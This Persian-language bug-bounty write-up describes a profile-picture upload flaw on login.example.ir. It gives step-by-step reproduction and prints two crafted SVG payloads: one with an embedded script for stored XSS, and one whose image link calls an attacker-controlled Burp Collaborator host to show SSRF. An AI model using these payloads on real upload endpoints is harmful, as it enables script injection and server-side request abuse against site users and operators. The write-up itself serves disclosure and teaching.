این رایتاپ بر اساس سناریوهای دریافت شده از متخصصین امنیتی باگدشت با هدف اشتراک گذاری دانش امنیتی و تسریع در ایمن سازی ارایه شده است.
به دلیل عدم پیکربندی مناسب بر روی کنترل دریافت ورودیهای کاربر (متن، فایل، و..) امکان بارگذاری فایل مخرب به عنوان تصویر پروفایل در آدرس login.example.ir وجود دارد که میتواند منجر به پیادهسازی حملات گوناگونی شود.
در سناریو انجام شده، جهت تست دو فایل customize شده با پیلودهای متفاوت به عنوان تصویر پروفایل آپلود شد که دو حمله SSRF و Stored xss توسط آنها پیادهسازی شد.
مراحل بررسی:
1. پس از ورود به حساب کاربری در سامانه login.example.ir، بر روی تصویر پروفایل خود کلیک کرده تا فایل مورد نظر را به عنوان آواتار آپلود نماییم.
2. ابتدا فایل مخرب حاوی پیلود XSS را انتخاب میکنیم و بر روی آن کلیک میکنیم.
3. حال با کلیک راست بر روی تصویر پروفایل خود و کلیک بر روی گزینهی Open image in new tap، پیغام جاواسکریپت در مرورگر نمایش داده میشود.
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("XSS by Jack"); </script> </svg>
حال برای پیادهسازی حمله SSRF، فایل مربوطه را آپلود میکنیم و مجددا با کلیک بر روی گزینه Open image in new tap، درخواست سرور که به سمت سرور خودمان (مهاجم) آمده است را مشاهده میکنیم.
پیلود مورد استفاده در تصویر مربوط به حمله SSRF:
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="http://y98ocs4j1ue5ti9xrr58ydade4kv8k.burpcollaborator.net" /></svg>
نکته:
مقدار http://y98ocs4j1ue5ti9xrr58ydade4kv8k.burpcollaborator.net درواقع آدرس سرور مهاجم است که در فایل جایگذاری شده است.
پس از باز کردن تصویر مربوط به حمله SSRF، سرور سامانه آسیبپذیر، درخواستهای خود را به سرور ما ارسال کرده است.